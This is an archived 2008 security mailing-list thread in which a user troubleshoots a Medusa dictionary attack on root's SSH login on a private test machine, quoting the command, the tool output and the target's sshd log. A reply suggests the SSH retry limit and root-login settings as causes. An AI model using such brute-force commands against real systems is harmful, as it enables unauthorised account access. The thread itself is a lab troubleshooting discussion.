Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

Re: attack ssh with medusa

From: Sergio Ruiz <sruiz () experienceis com>
Date: Mon, 25 Aug 2008 11:30:21 +0200
Hi!!

I have activated root login in my ubuntu because it is a test's computer.

thanks

On Fri, 22 Aug 2008 08:34:38 +0100
"Veal, Richard" <rveal () westernpower co uk> wrote:



#-----Original Message-----
#From: listbounce () securityfocus com
[mailto:listbounce () securityfocus com] On Behalf Of Sergio Ruiz
#
#when I start attack, I have a problem:
#$ medusa -h 192.168.1.2 -u root -P /home/sergi/John_Passw/D8.DIC  -M
ssh Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun #/ Foofus Networks
<jmk () foofus net>
#
#ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password:
- (1/106626) ACCOUNT CHECK: [ssh] Host: 
#192.168.1.2 (1/1) User: root (1/1) Password: . (2/106626) ACCOUNT
CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) #Password: .,m
#(3/106626) ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root
(1/1)
#Password: .,mn (4/106626) ERROR: Failed to retrieve supported
authentication modes.
#Aborting... ERROR: No supported authentication methods located.
#ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password:
.,mnb
#(5/106626)
#$
#
#
#in the victim pc:
#Aug 21 08:27:41 192.168.1.2 sshd[12649]: Failed password for root from
192.168.1.3 port 45652 ssh2 Aug 21 08:27:4
#192.168.1.2 last message repeated 3 times
#
#
#which the problem?
#
#Thanks..



My first thought (although I am very tired so it may be useless) is that
SSH is kicking the authentication attempt after 3 tries - admittedly
Medusa should have established another connection and carried on with
the brute force, but like I said, its just the first thought that
entered my tired brain.

Just had another thought - have you even enabled the ability for root to
login on your Ubuntu?!

Cheers

- 

Western Power Distribution (South West) plc / Western Power Distribution (South
Wales) plc Registered in England and Wales 
Registered number: 2366894 (South West) / 2366985 (South Wales) 
Registered Office: Avonbank, Feeder Road, Bristol, BS2 0TB 

This email and any files transmitted with it are confidential and intended solely
for the use of the individual or entity to whom they are addressed. If you have
received this email in error please notify postmaster () westernpower co uk
Previous By Date Next
Previous By Thread Next

Current thread: